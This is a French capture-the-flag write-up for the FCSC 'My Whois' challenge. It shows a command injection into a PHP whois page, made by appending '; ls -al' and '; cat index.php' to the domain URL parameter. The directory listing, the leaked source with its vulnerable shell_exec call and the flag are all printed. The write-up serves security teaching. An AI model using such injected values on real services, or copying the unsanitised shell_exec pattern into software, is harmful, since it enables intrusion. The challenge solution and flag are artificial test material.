# My Whois - misc

**Challenge**

Nous avons mis en place un service en ligne faisant de la recherche de nom de domaine. Pouvez-vous accédez à son code source ?

http://challenges1.france-cybersecurity-challenge.fr:7001


**Solution**

On est face à la page suivante :
![my_whois](my_whois.png)

Lorsque l'on utilise la page, on voit que le résultat ressemble à la sortie
des outils classiques Unix en ligne de commande. On comprend donc qu'il
va falloir utiliser une injection de commande.

Pour cela, on modifier le paramètre dans l'URL pour ajouter un ls :

http://challenges1.france-cybersecurity-challenge.fr:7001/index.php?domain=ssi.gouv.fr%3B+ls+-al

```shell
total 16
drwxr-xr-x 1 www-data www-data 4096 Apr 21 13:39 .
drwxr-xr-x 1 root     root     4096 Dec 29  2018 ..
drwxr-xr-x 2 root     root     4096 Apr 21 13:39 css
-rw-r--r-- 1 root     root     2083 Apr 21 13:39 index.php
```

Puis on regarde le contenu du fichier index.php :
http://challenges1.france-cybersecurity-challenge.fr:7001/index.php?domain=ssi.gouv.fr%3B+cat+index.php

Le résultat est alors le suivant :

```php
<?php
  
  /*
  ** The flag is:
  ** FCSC{2e3405155d63a7d82f215d17232ea102314509ecbe90d605cf8be26f4639153b}
  */

  ini_set('display_errors', 0);
  ini_set('display_startup_errors', 0);
  error_reporting(0);

  abstract class Command {
    public static function whois($domain) {
        $cmd = "/usr/bin/whois $domain";
        return shell_exec($cmd);
    }
  }
?>
```